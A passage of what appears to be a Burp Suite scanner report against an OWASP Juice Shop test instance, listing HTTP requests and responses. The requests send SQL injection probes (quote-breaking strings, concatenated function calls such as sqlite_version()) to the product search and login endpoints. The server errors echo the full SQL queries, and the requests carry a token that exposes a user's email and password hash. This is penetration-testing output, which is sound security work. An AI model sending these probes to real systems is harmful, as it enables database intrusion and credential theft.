Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 4

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:14:12 GMT
Connection: close

{"status":"success","data":[]}

Request 5

GET /rest/product/search?q=orangemgevt0z||'z(z'z&qgz85dvl=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 5

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:18 GMT
Connection: close
Content-Length: 370

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%orangemgevt0z||'z(z'z%' OR description LIKE '%orangemgevt0z||'z(z'z%') AND deletedAt IS NULL) ORDER BY name"
}
}

Request 6

GET /rest/product/search?q=orangeh2r7o6z(z'||'z&msr7c679=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 6

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:14:16 GMT
Connection: close

{"status":"success","data":[]}

Request 7

GET /rest/product/search?q=oranges2h1t7z%2b'z(z'z&ppz5g5rg=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 7

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:21 GMT
Connection: close
Content-Length: 368

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%oranges2h1t7z+'z(z'z%' OR description LIKE '%oranges2h1t7z+'z(z'z%') AND deletedAt IS NULL) ORDER BY name"
}
}

Request 8

GET /rest/product/search?q=orangetumpr0z(z'%2b'z&p04csh2n=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 8

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:14:18 GMT
Connection: close

{"status":"success","data":[]}

Request 9

GET /rest/product/search?q=orangehxmmu2z%26'z(z'z&ljjv7zcp=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 9

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:25 GMT
Connection: close
Content-Length: 368

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%orangehxmmu2z&'z(z'z%' OR description LIKE '%orangehxmmu2z&'z(z'z%') AND deletedAt IS NULL) ORDER BY name"
}
}

Request 10

GET /rest/product/search?q=orangegttcj2z(z'%26'z&nzdv384l=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 10

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:14:22 GMT
Connection: close

{"status":"success","data":[]}

Request 11

GET /rest/product/search?q=orangehsgbr8'||abf(1)||'&xbaf9utv=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 11

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:34 GMT
Connection: close
Content-Length: 370

{
"error": {
"message": "SQLITE_ERROR: no such function: abf",
"stack": "Error: SQLITE_ERROR: no such function: abf\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%orangehsgbr8'||abf(1)||'%' OR description LIKE '%orangehsgbr8'||abf(1)||'%') AND deletedAt IS NULL) ORDER BY name"
}
}

Request 12

GET /rest/product/search?q=orangeh06tu7'||abs(1)||'&il2fexl6=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 12

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:14:31 GMT
Connection: close

{"status":"success","data":[]}

Request 13

GET /rest/product/search?q=orangel6qpg3'||min(sqlite_versipn(),1)||'&qny0z95w=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 13

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:43 GMT
Connection: close
Content-Length: 426

{
"error": {
"message": "SQLITE_ERROR: no such function: sqlite_versipn",
"stack": "Error: SQLITE_ERROR: no such function: sqlite_versipn\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%orangel6qpg3'||min(sqlite_versipn(),1)||'%' OR description LIKE '%orangel6qpg3'||min(sqlite_versipn(),1)||'%') AND deletedAt IS NULL) ORDER BY name"
}
}

Request 14

GET /rest/product/search?q=orangevzckt5'||min(sqlite_version(),1)||'&yzzel4o4=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 14

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:14:40 GMT
Connection: close

{"status":"success","data":[]}
4.2. http://192.168.61.143:3000/rest/user/login [email JSON parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.61.143:3000
Path:   /rest/user/login

Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

Issue detail

The application reacts to inputs in a way that suggests it might be vulnerable to some kind of server-side code injection. The probes are listed below in chronological order.

Successful probes

Request 1

POST /rest/user/login?m4oquvvj=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 86
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"ema
il":"mike_landeck@hotmail.comrba922\\z`z'z\"\\","password":"juice-shop-password"}

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:24 GMT
Connection: close
Content-Length: 347

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Users WHERE email = 'mike_landeck@hotmail.comrba922\\z`z'z\"\\' AND password = 'a992b1b403cba28afb428e7f5a35c516'"
}
}

Request 2

POST /rest/user/login?zsdnu6ig=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 90
